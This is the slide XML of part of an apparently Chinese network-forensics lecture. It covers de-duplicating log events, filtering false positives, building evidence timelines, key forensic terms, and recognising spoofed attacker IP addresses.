                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．消除冲突</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：具有相同名称的相同事件会显示多个时间，例如某些拒绝服务攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Denial of Service Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）和渗透攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Penetration Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>），这时注意不要遗漏在攻击现场的每个步骤；一些事件重复极快，日志设备会在一个极短的时间内报告大量的相同事件。多个快速的事件会形成一个类似端口扫描的攻击现场，消除了冲突的事件与规范化的数据一起，可以形成事件时间线（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Event Timeline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．排除假象</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：一些“良性”事件（从安全的观点）看起来类似攻击，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统的端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>139</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的“攻击”，因此要注意区分和鉴别。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．创建证据链和事件时间线</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：使用多个数据源的经过消除冲突和规范化的事件，将证据链制成事件时间线。要特别注意不同数据源的时间基准（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CMOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时间的不同步），修改事件到统一的时间基准，并做出相应说明；要注意关联连接的事件形成现场。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．分析过程中不仅要记录发现了什么，更要记录是如何发现的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．用证据证明每一个假设</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。如果可能，结合使用取证和传统的调查方法以强化证据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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0610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6.1.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络取证的特点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755576" y="987574"/>
            <a:ext cx="7165712" cy="3516347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>针对黑客入侵过程的特点，网络取证的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>重点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>就要突出在下面环节：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>周界网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Perimeter Network)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：指在本地网的防火墙以外，与外部公网连接的所有设备及其连接；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>端到端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(End-to-End)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：指攻击者的计算机到受害者的计算机的连接；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>日志相关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Log Correlation)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：指各种日志记录在时间、日期、来源、目的甚至协议上满足一致性的匹配元素；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>④</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>环境数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Ambient Data)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：指删除后仍然存在，以及存在于交换文件和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>slack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>空间的数据；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>⑤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击现场</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Attack Scenario)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：将攻击再现、重建并按照逻辑顺序组织起来的事件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="16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6.5.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击者的确认</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187624" y="1131590"/>
            <a:ext cx="5976664" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>当分析大多数的攻击时，主要考虑到：确认攻击已经停止和恢复系统以及关键数据，是更重要的事情。如果攻击正在进行，如持续的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击，就要确认攻击者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址以便阻止攻击。下面解释了实施攻击中涉及的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址问题。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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6.5.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击者的确认</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1131590"/>
            <a:ext cx="7056784" cy="3369310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>假冒的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>许多攻击使用假冒的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址。对于需要建立连接的攻击，假冒很难成功，所以它用在不需要建立连接的情况。当假冒数据包时，攻击者并不关心是否得到响应。也有例外，攻击者从他们监控的子网上假冒一个地址，这样当响应到达那个系统时，他们就可以从网络上嗅探到。有时假冒是偶然发生的，如攻击者错误地配置了一个工具又恰巧用了一个内部的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址；有时攻击者是故意假冒地址，如假冒地址可能是真正的意定攻击目标，但这个活动可能被简单地视为一个中间人。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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6.5.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击者的确认</a:t>
            </a:r>
          </a:p>
